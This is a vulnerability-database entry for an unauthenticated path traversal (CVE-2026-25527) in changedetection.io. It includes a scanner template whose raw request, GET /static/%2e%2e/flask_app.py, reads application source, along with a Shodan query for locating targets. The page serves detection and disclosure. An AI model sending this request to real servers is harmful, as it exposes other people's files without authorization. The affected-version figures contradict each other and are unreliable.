/Vulnerability Library

changedetection.io <= 0.52.9 - Unauthenticated Path Traversal

CVE-2026-25527
Verified

Description

changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

changedetection.io

Published Date

June 5, 2026

Template Author

wrg-11

CVE-2026-25527.yaml
id: CVE-2026-25527

info:
  name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal
  author: WRG-11
  severity: medium
  description: |
    changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.
  impact: |
    Unauthenticated attackers can read local application source files, potentially exposing sensitive information.
  remediation: |
   Upgrade to version 0.53.2 or later.
  reference:
    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25527
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-25527
    epss-score: 0.00917
    epss-percentile: 0.5595
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: dgtlmoon
    product: changedetection.io
    shodan-query: http.html:"changedetection.io"
  tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure

http:
  - raw:
      - |
        GET /static/%2e%2e/flask_app.py HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "from changedetectionio", "def static_content(")'
          - 'contains(content_type, "text/x-python")'
        condition: and
# digest: 4a0a00473045022100b6cc43edabb6ef931fe1594335f9440f8874772feb6fbd26059629cc0ada590602205350ffd9a46b0728ee3c63b362ce5a665c4cf0635d96e4ba86730ffa23ac1709:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-25527
CWE ID:
cwe-22

References

https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvwhttps://nvd.nist.gov/vuln/detail/CVE-2026-25527

Remediation Steps

Upgrade to version 0.53.2 or later.